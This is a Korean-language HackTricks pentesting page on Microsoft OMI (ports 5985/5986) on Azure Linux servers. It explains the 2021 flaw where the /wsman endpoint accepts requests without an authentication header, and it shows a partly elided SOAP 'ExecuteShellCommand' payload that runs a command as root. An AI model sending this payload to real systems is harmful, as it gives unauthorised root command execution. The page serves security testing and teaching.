5985,5986 - Pentesting OMI

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

기본 정보

OMI는 Microsoft에서 제공하는 오픈 소스 도구로, 원격 구성 관리를 위해 설계되었습니다. 특히 다음과 같은 서비스를 사용하는 Azure의 Linux 서버에 중요합니다:

  • Azure Automation

  • Azure Automatic Update

  • Azure Operations Management Suite

  • Azure Log Analytics

  • Azure Configuration Management

  • Azure Diagnostics

이러한 서비스가 활성화되면 프로세스 omiengine이 root로 모든 인터페이스에서 수신 대기합니다.

사용되는 기본 포트5985 (http)와 5986 (https)입니다.

2021년 9월 16일에 관찰된 바에 따르면, 언급된 서비스를 사용하는 Azure에 배포된 Linux 서버는 취약한 OMI 버전으로 인해 취약합니다. 이 취약점은 OMI 서버가 인증 헤더를 필요로하지 않는 /wsman 엔드포인트를 통해 메시지를 처리할 때 발생하며, 클라이언트를 잘못 인증합니다.

공격자는 인증 헤더 없이 "ExecuteShellCommand" SOAP 페이로드를 보내어 서버가 root 권한으로 명령을 실행하도록 유도할 수 있습니다.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

이 CVE에 대한 자세한 정보는 **여기**를 확인하세요.

참고 자료

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

Last updated